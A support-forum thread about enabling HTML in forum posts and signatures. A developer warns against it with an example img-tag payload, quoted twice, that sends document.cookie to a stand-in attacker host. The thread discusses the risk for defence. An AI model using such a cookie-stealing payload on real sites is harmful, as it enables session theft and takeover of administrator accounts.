Is there a way to enable html code in Posts and Signatures?
No... and if you like your administrator account's current password, you'll probably want to keep it that way.
-[Unknown]
Although there is a safe html option in Edit Features and Options, but the tags are limited for the reasons [Unknown] pointed out.
Quote from: [Unknown] on March 14, 2005, 07:18:39 PM
No... and if you like your administrator account's current password, you'll probably want to keep it that way.
-[Unknown]
What happends when you use HTML code?
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?' + document.cookie;" />
-[Unknown]
Ohh, I understand now. its easyer to hack your site
I very much understand disallowing java and applets, but I fail to see how the vast majority of html tags pose any threat. Pretty much all boards have liberal html functions built in, obviously sans things like java and applets.
This is the only disappointment I've had with this package so far, as have my members.
At least a package for trusted members would be appropriate. Many of my members have been html authors for about a century now. ;)
You can turn on and off basic HTML which allows images and links or as I call them Here Refs and Img Sarks.
Admin > Features and Options,
though I think its not a good idea to turn it on.
Why not?
:D I *did* have it on - but it's so limited that nobody noticed! ;D
Quote from: [Unknown] on March 15, 2005, 03:51:10 AM
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?' + document.cookie;" />
-[Unknown]
Why can't SMF just str_replace($HTMLtext,"javascript:", "noJavaScriptAllowed...Punk:") ? :P
Because that would be easy to get round.
Quote from: Spamiam on June 17, 2005, 07:37:22 PM
:D I *did* have it on - but it's so limited that nobody noticed! ;D
I made a mod (More HTML Tags) that expand the tag list, but it's still limited to tags without attributes. It include things like list, header, abbreviation, center, etc. More complicated tags will result in easier security breach, which is a focus of 1.0.5... You need to compromise some of the time.
Quote from: Ben_S on June 30, 2005, 01:27:27 PM
Because that would be easy to get round.
How? As far as I know, you can't run any javascript without the word "javascript:" in an href or src. You could also disable use of the <script> tag.
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved. Firefox was completely unaffected.
It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.
-[Unknown]
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved. Firefox was completely unaffected.
It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.
-[Unknown]
Wow.
On a side note, is there a way to disallow Flash in signatures?
Just in signatures?
.signature embed, .signature object
{
display: none;
}
-[Unknown]
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
Yikes. :o It must be because back when IE 4/5 was being developed, they wanted a browser that would try to recover from HTML tag errors as opposed to rejecting them completely and barfing up a page (or crashing :P). As a result, you get IE trying to parse anything, leading to obvious security holes. :-\
Anyway, personally I don't like using html in my forum and almost everything you could ever want to do visually is already possible using BBC tags. :)
Quote from: [Unknown] on June 30, 2005, 09:09:19 PM
Just in signatures?
.signature embed, .signature object
{
display: none;
}
-[Unknown]
Excellent! thanks!